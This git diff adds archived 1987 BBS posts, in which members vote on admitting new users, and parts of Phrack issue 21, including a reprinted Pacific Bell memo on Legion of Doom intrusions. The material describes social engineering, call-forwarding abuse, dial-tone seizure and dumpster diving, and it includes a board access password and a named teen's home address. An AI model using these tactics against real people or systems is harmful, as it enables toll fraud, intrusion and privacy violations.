+  HACKING THE HP2000 (PARTS 1-6)
+  HACKING THE HP3000
+  HACKING TOPS
+  USING DIVERTERS
+
+OUT DATED PHILES:
+  HACKING MCDONALDS
+  HACKING PRIMOS (BEING REVISED)
+
+SPECIALTIES:
+LOCATING PBX'S AND DIVERTERS
+COMMON OPERATING SYSTEMS
+USING DIVERTERS
+
+HAVE LOTS OF GOOD EXPERIANCE ON:
+HP2000, HP3000, TOPS, RSTS, PRIMOS
+VAX/VMS, VM-370, UNIX, ETC...
+
+MY PHILES MAY BE READ ON THIS BOARD AND P-80
+OLD ALIAS: NANUK OF THE NORTH
+
+
+3/46: Ok...
+Name: <<< Taran King 1 >>>
+Date: 2:37 pm  Tue May 05, 1987
+
+I've talked to this fellow and he doesn't know a hell of a lot about phreaking
+but seems to know a bit about hacking anyway.  You may have seen him on Phreak
+Klass Room 2600 too, but I don't know since I'm not on there.  So what do ya
+think?
+-TK
+
+
+4/46: Nanuk..
+Name: <<< Mad Hatter 51 >>>
+Date: 2:59 pm  Tue May 05, 1987
+
+I've seen some of his posts of Phreak Klass and they're okay.  Althoug like he
+said, his files are a tad outdated.  I never really talked to him personally,
+so I'm undecided...
+
+-Hatter
+
+
+5/46: Can't say
+Name: <<< Knight Lightning 2 >>>
+Date: 5:09 pm  Tue May 05, 1987
+
+I don't know anything about his hack knowledge, but I do know that he is very
+confused about voice filtered loops.
+
+:Knight Lightning
+
+
+6/46: Also....
+Name: <<< The Mad Hacker 47 >>>
+Date: 11:46 pm  Tue May 05, 1987
+
+I can't say as I have never seen him on any BBS. Seems okay, although I
+usually hate anyone that Types in all Caps(Proper Capitalization, Eh
+TK???)....
+
+Seems okay, I guess, but then I really don't know......
+
+-TMH
+
+
+7/46: Nanuk
+Name: <<< The Prophet 23 >>>
+Date: 12:28 am  Wed May 06, 1987
+
+"Specialties- locating PBX's and using diverters"? Nay!
+
+  -TP
+
+
+8/46: He's ok
+Name: <<< Control C 8 >>>
+Date: 9:09 pm  Wed May 06, 1987
+
+I think he's ok, I just let him on my system and he seem like he know's what
+he's talking about when it comes to computer systems.. I say Ok..
+
+
+9/46: Who
+Name: <<< Knight Lightning 2 >>>
+Date: 12:33 am  Thu May 07, 1987
+
+Who did Nanuck say he knew (as references) from the old days that we could
+check with and who now?
+
+:Knight Lightning
+
+
+10/46: Hmm...
+Name: <<< Taran King 1 >>>
+Date: 7:02 am  Thu May 07, 1987
+
+He hangs out with his own little clique.  His good buddy is Blitziod.  He's
+also friends with Lefty Carlson, Fatal Error 313, Mic Ripoff, Silent Rebel/
+Phantom Fighter, and Striker (not the one from the IBM pirate boards I don't
+think).  I don't know how to really get in touch with any of these people, not
+that I could go by their words anyway...Later
+-TK
+
+
+11/46: Vote
+Name: <<< Computer Wiz Kid 54 >>>
+Date: 10:24 pm  Thu May 07, 1987
+
+Sounds Good, but like someone said before, i hate CAPS......Looks LIKE someone
+is YELLING AT YOU, but hey if he is as good as he said he was, why not...
+
+
+12/46: Fatal Error 313
+Name: <<< Knight Lightning 2 >>>
+Date: 11:33 pm  Thu May 07, 1987
+
+Not meaning to get crude or vulgar here, but isn't this the FE that is dead?
+If so, I think you're going to have a bitch of a time getting a hold of him.
+
+:Knight Lightning
+
+
+13/46: FE
+Name: <<< The Scanner 20 >>>
+Date: 1:38 am  Fri May 08, 1987
+
+ Fatal Error has been gone for some time now. He and a good friend of mine
+kinda disappeared about 2 weeks before I was raided. I havent heard from either
+one since then.   ???
+
+                      _-The Scanner
+
+Well, May as well plug my board while im here.....
+
+       -----------------------
+       Scan Line  313-851-0912
+       -----------------------
+       Designed for the serious
+       telecommunicationalist..
+                  - yeah sure
+
+Newuser pass = OPCODE
+
+
+14/46: FE 617
+Name: <<< Taran King 1 >>>
+Date: 6:31 am  Fri May 08, 1987
+
+The one in 617 who used to run Metropolis is dead...the one in 313 is just
+dormant.  Stupid posts for stupid people by stupid people
+
+
+15/46: Fatal Error....
+Name: <<< The Disk Jockey 13 >>>
+Date: 6:57 am  Fri May 08, 1987
+
+Wasn't he killed in a motorcycle accident?  Or is he laying low and thats what
+he wants people to think?
+
+                                                 -The Disk Jockey
+
+
+16/46: Fatal Error
+Name: <<< Knight Lightning 2 >>>
+Date: 8:02 am  Fri May 08, 1987
+
+Its a good theory, but I believe the incident was real.
+
+:Knight Lightning
+
+
+17/46: Any one else??
+Name: <<< Mad Hatter 51 >>>
+Date: 2:32 pm  Fri May 08, 1987
+
+Any in else in the "Phreakdom" die?  That seems weird.  I get the feeling of a
+society without death/diseases/etc.. No, for the current Votee....
+
+-Hatter
+
+
+18/46: Death.....
+Name: <<< The Disk Jockey 13 >>>
+Date: 7:28 pm  Fri May 08, 1987
+
+Ever hav that you know die?  It's always someonwho you know, but never really
+think about.  It's wierd as hell, and it makes you wonder if you are next.
+Ever wonder what death is like?  I guess it can't be imagined....  Ever get
+really stoned and just sit and try to compare
+
+FUCK IT.....I'll stick to new scanning, I don't even know what the hell I am
+doing....!
+
+                                            -The Disk Jockey
+
+
+19/46: In general
+Name: <<< Knight Lightning 2 >>>
+Date: 12:19 am  Sat May 09, 1987
+
+And for the record this is on the wrong sub, the idea of death in the phreak
+world has really been "getting busted" or "retiring."  That is the only way we
+can really think about it in our society, I mean cause phreaks just don't die
+everday, but they do get busted about that often, so that gives us a more
+realistic view if we were to look at the phreak zone as a true realm.
+
+:Knight Lightning
+
+
+20/46: FE (again)
+Name: <<< Phantom Phreaker 46 >>>
+Date: 2:28 am  Sat May 09, 1987
+
+ Fatal Error 617 died from a motorcycle accident while riding in his woods.
+Micro Man (617, was sysop of Newsweek BBS) called me and told me this on July
+3, 1986. I guess no one else heard about this for a while, I remember the date
+because it was right before the fourth of July. FE 617 was into COSMOS and ran
+Metropolis, as someone said. FE 313 is a vocal phreaker and (as far as I know)
+doesn't have a modem.
+
+
+21/46: really
+Name: <<< Lucifer 666 43 >>>
+Date: 2:35 am  Sun May 10, 1987
+
+KL & Tk gasp! print false info ? gasp!
+
+anyways, exactly how much fun can it be to be a diverter expert?
+
+
+22/46: FE's
+Name: <<< Control C 8 >>>
+Date: 11:22 am  Sun May 10, 1987
+
+FE 313 is alive and well, I don't think he has a modem but he's in some group
+with that Nacka of the north (or what ever his name is)  randy you should have
+his number around somewhere..
+
+Control
+.s
+oops
+
+
+23/46: Galactus
+Name: <<< Doom Prophet 21 >>>
+Date: 10:57 pm  Sun May 10, 1987
+
+I sorry butz I say no to Galactus...I don't think he's good enough to be on MSP
+(not saying I am good either). Some of the stuff here is not fit for thte
+irresponsible...I don't believe that he is 21 for some strange reason. Oh well
+trying not to discriminate but I say definately no.
+
+Doomy
+
+
+24/46: Galactus.....
+Name: <<< The Disk Jockey 13 >>>
+Date: 6:43 am  Mon May 11, 1987
+
+Doom's right.....fuck 'em.  I don't buy for a second that he's 21.
+
+                                            -The Disk Jockey
+
+
+25/46: Add
+Name: <<< Knight Lightning 2 >>>
+Date: 6:48 pm  Mon May 11, 1987
+
+I myself was unimpressed by his resume and the conversation we (Taran and I)
+had with Galactus clearly has left a mark with me that he doesn't deserve a
+place on MSP at this time.
+
+:Knight Lightning
+
+
+26/46: NO
+Name: <<< Phantom Phreaker 46 >>>
+Date: 7:24 pm  Tue May 12, 1987
+
+ My vote on Galactus is NO. Yes, I am conceited as hell, an asshole, etc. I
+always feel like a jerk when I vote 'NO' because I feel like a segragationist.
+
+
+27/46: I feel the same.
+Name: <<< Evil Jay 26 >>>
+Date: 9:05 am  Wed May 13, 1987
+
+   Galactacus (whatever the fuck his name is) is a knowledgeable person, but
+I think he could still go awhile before getting let on.   Sigh, he is a Prime
+person tho (hell, practically inspired me to write a Prime file when I read
+that pathetic thing from way back).
+
+Still, its no.
+
+-The Big J
+
+
+
+28/46: Guess its No, yes?
+Name: <<< Knight Lightning
+2 >>>
+Date: 5:44 pm  Wed May 13, 1987
+
+Looks like there has been an overwhelming vote of dissapproval of Galactus
+becoming a member here.  Whats the woid Taran?
+
+:Knight Lightning
+
+
+29/46: theres no way
+Name: <<< Lex Luthor 36 >>>
+Date: 10:46 am  Fri May 15, 1987
+
+There is no way Galactus "knows very well" all those OS's
+I would say 3 operating systems is the maximum for most hackers as far as a
+complete (its never really complete) knowledge of OS's is concerned. Hell I
+know VMS, UNIX, and VM/CMS very well but thats it. The rest I know enough to
+get around in. OS's are like languages, people know a few words in spanish or
+french but don't know how to speak fluently in those languages, but they still
+tell people they can. That is what hackers do. I find this mainly on their
+applications. Most hackers specialize in one operating system. Sometimes they
+move on and specialize in others, sometimes they stick to the one they like.
+
+More ramblings from Lex
+
+
+30/46: ummmmm.
+Name: <<< Lucifer 666 43 >>>
+Date: 2:11 am  Sun May 17, 1987
+
+but what if he unleashes with full force!
+
+hmmmm.    isnt this nice. our own little democracy...sort of..
+
+ourvote =  3%
+randy's = 97%
+
+           notice.... the above
+
+
+31/46: Galac.
+Name: <<< The Sensei 18 >>>
+Date: 6:37 pm  Thu May 21, 1987
+
+
+   Galac., doesn't sound like a honest to goodness hacker.  He probably calls
+us his local UNIX system and uses defaults to hack it out.
+
+   Sounding sarcastic, but you know how it is.  1987 for users is really lousy.
+
+   What are the specifications for electing a new person to the system.  I
+have someone of interest.
+
+Ts
+
+
+32/46: Users...
+Name: <<< Taran King 1 >>>
+Date: 7:07 pm  Thu May 21, 1987
+
+The user must be experienced in some manner or have a good general knowledge
+of telecommunications.  If you wish for someone to get access here, have them
+make out an application for themselves, get it from them, and then upload it
+to the D: drive on the AE and I'll put it up as a message.
+
+We shall wait until Galactus shows himself more worthy of being on the board.
+Now we come to the problem with Solid State.  He was kicked off not too long
+ago but he wants back on (I guess).  One way or another, he said he'd be
+writing up "his side" of the story so at least we'll all get to hear what he
+has to say for himself.  Life is a bitch...
+-TK
+
+
+33/46: well...
+Name: <<< Sir Francis Drake 56 >>>
+Date: 7:01 pm  Fri May 22, 1987
+
+just to get my remarks in early...Iv talked to State & Stan about it and I
+think State should be let back on.
+
+He was kicked off because he SUPPOSEDLY read msgs to/gave his pswd to Stanly.
+Now this info mainly came from Stan who would claim that he used states
+password "all the time".  Now since, stan is such a notorious liar the
+whole thing is obviously questionable.
+
+Now another main complaint (from what ive gathered talking to KL) is that
+State would not tell TK/KL how Stan gets on MSP even though State apparently
+knows.  This may sound sorta lame, but if State starts telling on stan he
+wont be trusted, and it would be lame of him.
+
+So it would seem that as long as State does not further help stand (which is
+EXTRENELY unlikely even if he ever did) Stan he should be let back on as he
+was/will be a "valuable user".
+
+so there.
+sfd
+
+
+34/46: Wrong...
+Name: <<< Taran King 1 >>>
+Date: 7:10 pm  Fri May 22, 1987
+
+I don't want to start a debate because Craig's gonna be here real soon
+preaching about everything but I'd just like to have it stated that I've got a
+neutral 3rd party that was on a conversation between Stan and Nate where Nate
+was reading posts from MSP, which I had previously told him was grounds for
+deletion from MSP if he read them to Stan.  Thank you and here's my address
+-TK
+
+
+35/46: Preech!
+Name: <<< Knight Lightning 2 >>>
+Date: 11:58 pm  Sat May 23, 1987
+
+This is true.  In OQ's own word's "Nate is my partner in crime."  Now perhaps
+you may call OQ a liar or say he is bluffing, but their friendship exists for
+better or for worse.  Now both OQ and SS claim to have at least 3 or more
+accounts on here anyway and Stan would like his own account to post with as
+well (yeah yeah, why'd you even mention it KL, it'll never happen).  As good a
+hacker that State is, I am not convinced that he should be trusted in any
+aspect towards the system especially since he has aided succesful attempts to
+breech its security.  I mean, thats just the way it is, nothing seems to ever
+change, etc.
+
+One other thing to mention, its not like we "owe" anyone an account and
+although I suppose I have a lot of pull, Taran King will have the final say.
+
+:Knight Lightning
+
+36/46: Solid S.
+Name: <<< The Sensei 18 >>>
+Date: 7:25 am  Sun May 24, 1987
+
+    I don't know Solid too good....just that he's one a specific system 24hrs
+a day, it seems.  I think he's just a modem kid out for a fun ride.
+
+    Let'em cool for a year.  You can't blame a guy for hacking ANY system
+though.  I'm split.
+
+Ts
+
+
+37/46: s. state
+Name: <<< The Leftist 71 >>>
+Date: 4:38 pm  Mon May 25, 1987
+
+Solid State in my opinion is a dick, and shouldnt be let on any system, much
+less this one..
+
+
+38/46: Nate
+Name: <<< The Executioner 19 >>>
+Date: 9:50 pm  Tue May 26, 1987
+
+Anyone ever look up the word "Nate" in the dictionary???
+
+It means...
+
+"VArious forms of semi-aquatic salamanders"
+
+OOOOPS! That's Newt, I mean Lock Lifter.....eeeek!!
+
+Nate - The skin that stretches from the opening of an anal cavity to
+       the base of the penis.
+
+Enough said....
+
+
+39/46: Nates
+Name: <<< Mad Hatter 51 >>>
+Date: 10:45 pm  Sat May 30, 1987
+
+Nates - (N) The buttocks
+
+from Webster's 20,000 word dictionary.  Where did you get your definition?
+
+
+40/46: FRED FROM RCMAC
+Name: <<< Icarus 15 >>>
+Date: 3:29 am  Sun May 31, 1987
+
+This is the handle of someone who claims he is in LOD.
+
+Well, Lex, is he?
+
+
+41/46: HAhaahahahahaha
+Name: <<< Control C 8 >>>
+Date: 10:04 am  Sun May 31, 1987
+
+Who told you that??  Fred From RCmac hahahahah!!!
+
+While I'm here anybody know about the new switching system called ADDR ESS?  I
+here it's mor advanced then DMS-300.
+
+GEORGE FROM MMOC
+   LOD/H
+
+
+42/46: Fred from Rcmac
+Name: <<< The Executioner 19 >>>
+Date: 4:17 pm  Sun May 31, 1987
+
+I saw him on Digital Logic's BBS.  He didnt show much of anything...
+
+
+43/46: Fred from Rc-Mac
+Name: <<< Control C 8 >>>
+Date: 9:47 pm  Sun May 31, 1987
+
+Fred is Phiber Optic who is Public Enemy 1 who is Ilduce (the biggest luzer
+in the world).. He disn't know shit about shit!
+
+
+44/46: Phiber Optic.....
+Name: <<< The Disk Jockey 13 >>>
+Date: 12:55 am  Mon Jun 01, 1987
+
+.....claimed on Atlantis that he can get you the REMOB number for your local
+CO by simpley leaving him your NPA+PRE....he also says that there is a "REMOB
+OR FORTELL" for EVERY CO.
+
+                                       -The Disk Jockey
+
+45/46: Well....
+Name: <<< The Executioner 19 >>>
+Date: 8:11 am  Mon Jun 01, 1987
+
+Well, we can ALL see that Fred is just a mental powehouse chock full to the
diff --git a/phrack21/1.txt b/phrack21/1.txt
new file mode 100644
index 0000000..5ef0170
--- /dev/null
+++ b/phrack21/1.txt
@@ -0,0 +1,40 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 21, File 1 of 11
+
+
+                    Phrack Inc. Newsletter Issue XXI Index
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+                               November 4, 1988
+
+     Welcome to Phrack Inc. Issue XXI.  So far, we've been relatively
+productive in getting files and getting issues together for the future.  If you
+would like to contribute a file for Phrack Inc., please contact The Mentor or
+Epsilon and they will forward the files to us, or if you are on any of the
+connecting networks, send mail and/or files to Taran King's address:
+C488869@UMCVMB.BITNET.  We are pleased to introduce a trilogy pertaining to
+the security of the phreak/hack community and various aspects thereof.  The
+first file, "Shadows Of A Future Past" and the next two files will be in the
+next two issues, so be watching for those.  It's great to be "back."
+
+                                              Taran King & Knight Lightning
+
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+This issue contains the following files;
+
+1.  Index by Taran King and Knight Lightning
+2.  Phrack Pro-Phile on Modem Master by Taran King
+3.  Shadows Of A Future Past (Part 1 of the Vicious Circle Trilogy) by KL
+4.  The Tele-Pages by Jester Sluggo
+5.  Satellite Communications by Scott Holiday
+6.  Network Management Center by Knight Lightning and Taran King
+7.  Non-Published Numbers by Patrick Townsend
+8.  Blocking Of Long Distance Calls by Jim Schmickley
+9.  Phrack World News Special Edition II by Knight Lightning
+10. Phrack World News Issue XXI Part 1 by Knight Lightning and Epsilon
+11. Phrack World News Issue XXI Part 2 by Knight Lightning and Epsilon
+
+_______________________________________________________________________________
diff --git a/phrack21/10.txt b/phrack21/10.txt
new file mode 100644
index 0000000..c705dc7
--- /dev/null
+++ b/phrack21/10.txt
@@ -0,0 +1,423 @@
+                                ==Phrack Inc.==
+
+                     Volume Two, Issue 21, File 10 of 11
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN The Legacy...                       ...Lives On PWN
+            PWN                Phrack World News                PWN
+            PWN                   Issue XXI/1                   PWN
+            PWN                                                 PWN
+            PWN           Created by Knight Lightning           PWN
+            PWN                                                 PWN
+            PWN              Written and Edited by              PWN
+            PWN          Knight Lightning and Epsilon           PWN
+            PWN                                                 PWN
+            PWN The Future...                     ...Is Forever PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+On The Edge Of Forever                                         November 4, 1988
+~~~~~~~~~~~~~~~~~~~~~~
+Greetings and welcome to Phrack World News Issue XXI!  As most of you have
+realized, Taran King and I are back to stay and the tradition of Phrack Inc.
+lives on.  November 17, 1988 marks the Three Year Anniversary of Phrack Inc.
+and we have never been prouder of our efforts to bring you the best magazine
+possible.
+
+However, we can not do it alone.  Both Taran King and I have been reduced to
+completely legal status and can not afford the luxury of calling bulletin
+boards or contacting all the people we would like too.
+
+Epsilon has been helping us a lot by acting as the collection agency for many
+of the files for Phrack and several news articles as well.  Please, if you have
+a file for Phrack Inc. or an article for PWN contact him or leave mail for The
+Mentor.  And speaking of The Mentor, The Phoenix Project has a new number;
+(512) 441-3088.  Be sure to give it a call.
+
+The article about Pacific Bell in this issue may contain some information that
+has been seen before.  Regardless of that, PWN is a place where such
+information can be indexed for later reference and helps keep important events
+and happenings in a certain continuity which is beneficial to everyone.
+
+This issue of Phrack features the Second Special Presentation of Phrack World
+News, which contains the abridged edition of the WGN Radio Show that dealt with
+computer hackers and features John Maxfield.
+
+With regard to the file about Teleconnect Long Distance.  Hatchet Molly says
+that now Teleconnect "flags" suspect bulletin boards and if a Teleconnect
+calling card is used to call one, the card number is cancelled and a new card
+is mailed to the customer within three days.  What a wonderful company policy
+that is.
+
+For the months ahead, I am working on a file about hackers abroad, mostly
+focusing on the Chaos Computer Club, which I have begun to have strong
+relations with, and some other hacker instances in Europe and other parts of
+the world.
+
+Scheduled for January/February is a file series on the Wide Area Networks;
+Bitnet and quite possibly ARPAnet, MILInet, NSFnet, IBM's VNET, CCnet, UUCP,
+CSnet, SPAN, JANet, JUNet, and the list goes on.  The main emphasis will be on
+Bitnet though with secondary emphasis on UUCP and the other networks.
+
+Hope you enjoy this issue and remember...               "The Future Is Forever"
+
+:Knight Lightning
+_______________________________________________________________________________
+
+Pacific Bell Means Business                                     October 6, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The following information originally appeared in WORM Newsletter, a publication
+produced and distributed by Sir Francis Drake.  The series of memos presented
+here are shown to enable the members of today's hacking community to fully
+understand the forces at work that seek to bring them down.  The memo(s) have
+been edited for this presentation.                                          -KL
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Copy For: Roland Donaldson                                       August 3, 1987
+Subject:  Unauthorized Remote Computer Access
+
+     San Francisco, July 29, 1987
+     Case Nos.: 86-883, 87-497
+
+T. M. CASSANI, Director-Electronic Operations:
+
+Electronic Operations recently investigated two cases involving a number of
+sophisticated hackers who were adept at illegally compromising public and
+private sector computers.  Included among the victims of these hackers was
+Pacific Bell, as well as other local exchange carriers and long distance
+providers.
+
+Below is a synopsis of the two cases (87-497 and 86-883), each of which
+demonstrate weaknesses in Pacific Bell's remote access dial-up systems.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Case No. 87-497
+---------------
+On May 14, 1987, Electronic Operations received a court order directing Pacific
+Bell to place traps on the telephone numbers assigned to a company known as
+"Santa Cruz Operations."  The court order was issued in order to identify the
+telephone number being used by an individual who was illegally entering Santa
+Cruz Operations' computer and stealing information.
+
+On May 28, 1987, a telephone number was identified five separate times making
+illegal entry into Santa Cruz Operations' computer. The originating telephone
+number was 805-PRE-SUFF, which is listed to Jane Doe, 8731 W. Cresthill Drive,
+Apt. 404, Thousand Oaks, California.
+
+On June 3, 1987, a search warrant was served at 8731 W. Cresthill Drive, Apt
+404, Thousand Oaks, California.  The residents of the apartment, who were not
+at home, were identified as Jane Doe, a programmer for General Telephone, and
+Kevin Hacker, a known computer hacker.  Found inside the apartment were three
+computers, numerous floppy disks and a number of General Telephone computer
+manuals.
+
+Kevin Hacker was arrested several years ago for hacking Pacific Bell, UCLA and
+Hughes Aircraft Company computers.  Hacker was a minor at the time of his
+arrest.  Kevin Hacker was recently arrested for compromising the data base of
+Santa Cruz Operations.
+
+The floppy disks that were seized pursuant to the search warrant revealed
+Mitnick's involvment in compromising the Pacific Bell UNIX operation systems
+and other data bases.  The disks documented the following:
+
+  o  Hacker's compromise of all Southern California SCC/ESAC computers.  On
+     file were the names, log-ins, passwords, and home telephone numbers for
+     Northern and Southern ESAC employees.
+
+  o  The dial-up numbers and circuit identification documents for SCC computers
+     and Data Kits.
+
+  o  The commands for testing and seizing trunk testing lines and channels.
+
+  o  The commands and log-ins for COSMOS wire centers for Northern and Southern
+     California.
+
+  o  The commands for line monitoring and the seizure of dial tone.
+
+  o  References to the impersonation of Southern California Security Agents and
+     ESAC employees to obtain information.
+
+  o  The commands for placing terminating and originating traps.
+
+  o  The addresses of Pacific Bell locations and the Electronic Door Lock
+     access codes for the following Southern California central offices ELSG12,
+     LSAN06, LSAN12, LSAN15, LSAN23, LSAN56, AVLN11, HLWD01, HWTH01, IGWD01,
+     LOMT11, AND SNPD01.
+
+  o  Inter-company Electronic Mail detailing new login/password procedures and
+     safeguards.
+
+  o  The work sheet of an UNIX encryption reader hacker file. If successful,
+     this program could break into any UNIX system at will.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Case No. 86-883
+---------------
+On November 14, 1986, Electronic Operations received a search warrant directing
+Pacific Bell to trap calls being made to the Stanford University computer.  The
+Stanford Computer was being illegally accessed and was then being used to
+access other large computer systems throughout the country.
+
+The calls to the Stanford Computer were routed through several different common
+carriers and through numerous states.  Through a combination of traps, traces
+and sifting through information posted on the Stanford computer, several
+suspects were identified throughout the United States.
+
+The group of computer hackers who illegally accessed the Stanford computer
+system were known as "The Legion of Doom."  Subsequent investigation indicated
+that the Legion of Doom was responsible for:
+
+  o  The use of Stanford University high-speed mainframes to attack and hack
+     ESAC/SCC mini compuuters with an UNIX password hacker file.  Password
+     files were then stored on the Stanford systems for other members of the
+     Legion of Doom to use.  Login and passwords for every local exchange
+     carrier as well as AT&T SCC/ESAC mini computers were on file.
+
+  o  The Legion of Doom used the Stanford computers to enter and attack other
+     institutions and private contractors' computers.  Some of the contractors'
+     computers were used for national defense research.
+
+On July 21, 1987, eight search warrants were served in three states at homes
+where members of the Legion of Doom reside.  Three of the searches were
+conducted in California.  Steve Dougherty, Senior Investigator-Electronic
+Operations, accompanied Secret Service agents at the service of a search
+warrant at 2605 Trousdale Drive, Burlingame, California, which was the
+residence of Stan QUEST, a sixteen-year-old member of the Legion of Doom.
+(Correction - Oryan QUEST has never been a member of the Legion Of Doom.   -KL)
+
+Dougherty interviewed QUEST, who had used the pseudonym "O'Ryan Quest," (Oryan
+QUEST) when accessing computers.  During the interview, QUEST admitted the
+following:
+
+  o  The entering of central offices, (Burlingame, San Mateo, San Bruno,
+     Millbrae) disguised as a Federal Express deliveryman.  The entries were
+     done to case out the CO's for the purpose of finding computer terminals
+     with telephones, the locations of switches and bays, the names of
+     Comtechs, and materials related to the operations of the central office.
+     QUEST also claimed to have been in the AT&T Administration office on
+     Folsom Street, San Francisco.
+
+  o  QUEST's telephone service had been disconnected twice for nonpayment, and
+     twice he had his service restored by impersonating a service
+     representative.
+
+  o  Learning to test circuits and trunks with his computer by using ROTL and
+     CAROT test procedures.
+
+  o  Members of the Legion of Doom often accessed test trunks to monitor each
+     other's lines for fun.
+
+  o  On several occasions QUEST would post the telephone number of a public
+     coin phone for access to his BBS, Digital IDS.  He would then access teh
+     Millbrae COSMOS wire center and add call forwarding to the coin phone.  He
+     would activate the call forwarding to his home telephone number, securing
+     the identity of his location.
+
+  o  QUEST would impersonate an employee who had authorization to use a Data
+     Kit and have it turned on for him.  When he was done, he would call back
+     and have the Data Kit turned off.
+
+  o  QUEST also would use his knowledge to disconnect and busyout the telephone
+     services of individuals he did not like.  Further, he would add several
+     custom calling features to their lines to create larger bills.
+
+  o  It was very easy to use the test trunks with his computer to seize another
+     person's dial tone and make calls appear on their bills.  QUEST did not
+     admit charging 976 calls to anyone, but he knew of others who did.
+
+  o  When the Legion of Doom attacked a computer system, they gave themselves
+     five minutes to complete the hacking.  If they were not successful in five
+     minutes, they would attempt another system.  The Legion of Doom was able
+     to crack a computer in under five minutes approximately 90% of the time.
+
+  o  QUEST would impersonate employees to get non-published telephone listings.
+     QUEST received the non-published listing for Apple Computer Founder, Steve
+     Wozniak, and members of The Beastie Boys rock group.
+
+  o  QUEST told Dougherty of one New York member of the Legion of Doom, "Bill
+     from Arnoc," (Bill From RNOC) who has been placing his own traps in New
+     York.  Bill from Arnoc (Bill From RNOC) helped QUEST place traps in
+     Pacific Bell.
+
+         (Gee Stan, you forgot to admit sneaking over the border. -KL)
+
+The review of the evidence seized at QUEST's residence tends to corroborate all
+QUEST's statements.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Conclusions
+-----------
+There are some important conclusions that can be drawn from the above two cases
+regarding future computer system concerns.
+
+  o  The number of individuals capable of entering Pacific Bell operating
+     systems is growing.
+
+  o  Computer Hackers are becoming more sophisticated in their attacks.
+
+  o  Dial-up ports will always be a target for computer entry by a hacker.
+
+  o  Even dial-up ports with remote callbacks and manually controlled modems
+     can be compromised.
+
+  o  A hacker can place a central office off-line by overloading a SCC mini
+     computer by improperly placing traps or by putting traps on several DID
+     multi-trunk groups such as MCI or Sprint groups.
+
+  o  Terrorist or Organized Crime organizations could use this underground
+     computer technology against Pacific Bell or to their own advantage.
+
+  o  Pacific Bell proprietary data bases such as PTT ESAC or PB2 ESAC could be
+     compromised.
+
+  o  The integrity of accurate customer billing statements have been
+     compromised through access to the CEBS (Computerized Electronic Billing
+     System) and will remain questionable.  A customer can dispute large
+     direct-dialed calls and claim his telephone was accessed by a computer
+     hacker.
+                                     - - -
+  o  Oryan QUEST has a really BIG mouth and would dick over anyone and everyone
+     to overcome his inferiority complex from being an illegal alien without a
+     green card.  Outside of the Dan The Operator/Maxfield incident, I have
+     never seen such a mass admission of guilt.  To make matters worse, QUEST
+     probably made up most of the incidents to make himself sound like a really
+     big time hacker.
+                                     - - -
+Recommendations
+---------------
+The information gained as a result of the above investigations should be shared
+with those individuals responsible for the integrity of our computer systems.
+Further, an ongoing business partnership between security and the individuals
+responsible for the integrity of our computer systems should be initiated and
+maintained to ensure prompt, effective resolution of future computer related
+security issues.
+
+JOHN E. VENN
+Manager-Electronic Operations
+
+
+                      Special Thanks To Sir Francis Drake
+_______________________________________________________________________________
+
+He's Really Just Out Of Control                                      PostCon'88
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+                      "I would SHRED everything, because
+                       we get so much information
+                       out of the dumpster,
+                       it's UNREAL..."
+
+                       -- Control C
+
+Over the last few months there has been a lot of controversy about the
+mysterious cricumstances regarding Michigan Bell and Control C.  To set the
+record straight, ^C gave me the full details of what happened so I could pass
+it on to you.
+
+Just prior to leaving Chicago, where ^C had been going to school, he had
+illegally accessed an AOL system belonging to Michigan Bell.  The system
+operator broke in on him and ^C tried unsuccessfully to pass himself off as a
+legitimate user.  When this did not work, he hung up and did not give it a
+second thought.  Upon returning home to Detroit, he had a message waiting for
+him to contact the sysop of the AOL system.  He calling him and they,
+accompanied by Michigan Bell security, went out to lunch.  To avoid being
+prosecuted, Control C had to give up all of the information he had on that
+system and explain how he had gotten in.  Since he had cooperated, they let him
+go without further hassle.  Unfortunately, Control C was soon busted again for
+breaking into his Central Office, but this time he was not going to get off so
+easily.  He had to agree to making a talk show movie and a poster (quoted in
+the beginning of the article) for Michigan Bell.  Both of these items have been
+distributed across the country to better illustrate the hacker mind-set and as
+a reminder to destroy important documents that were being thrown away.
+
+While being interrogated by Michigan Bell security department, Control C was
+shown a list of recently busted hackers from the July 21, 1987 sweep of the
+country.  On this list was Sir Francis Drake, which is how the rumor about SFD
+being busted last year got started.  However, what Control C and Michigan Bell
+did not know was that when Mark Gerardo was apprehended last year, he was
+believed to be SFD and as such was entered in their files incorrectly.
+
+                       Information Provided by Control C
+
+     With a little help figuring out the SFD mixup from me and Taran King
+
+:Knight Lightning
+_______________________________________________________________________________
+
+North Dakota Nightmare                                       September 10, 1988
+~~~~~~~~~~~~~~~~~~~~~~
+               "For Kracking Crue's Docs Avage The Game Is Over"
+
+In March of 1987, the North Dakota members of Kracking Crue (Docs Avage and
+SpyroGyra (also known as Ractor)) found a local extender and were able to hack
+out a code.  They both lived on campus at North Dakota State University and
+were able to abuse the code without the worry of being caught because of the
+campus's Dimension phone system giving them a high degree of anonymity.
+
+They used this code for the entire rest of the school year and nothing had
+happened to prevent them from abusing it.  Because of this lack of security, DA
+and SG began to believe that the code would be safe for them to use anywhere.
+The school year ended and the members of the Crue went home.  Eventually the
+Crue discovered a 1-800 number for the long distance service they had been
+abusing and began to use it once again.  However, they were soon to discover
+that they were not half as safe as they thought.
+
+The LD company had indeed been watching that code, but could not do anything to
+catch the Crue because of the Dimension system on NDSU campus.  Docs Avage
+started to use the code from his apartment to call SpyroGyra and a few other
+people and the company got his line tapped and kept a record of where all his
+calls went to.
+
+In Docs Avage's own words;
+
+    "On July 27th, 1988, I arrived back at my apartment after spending a
+     weekend with my parents at their home.  I found it rather interesting to
+     discover three extra cars in the parking lot, one of which was a Dodge
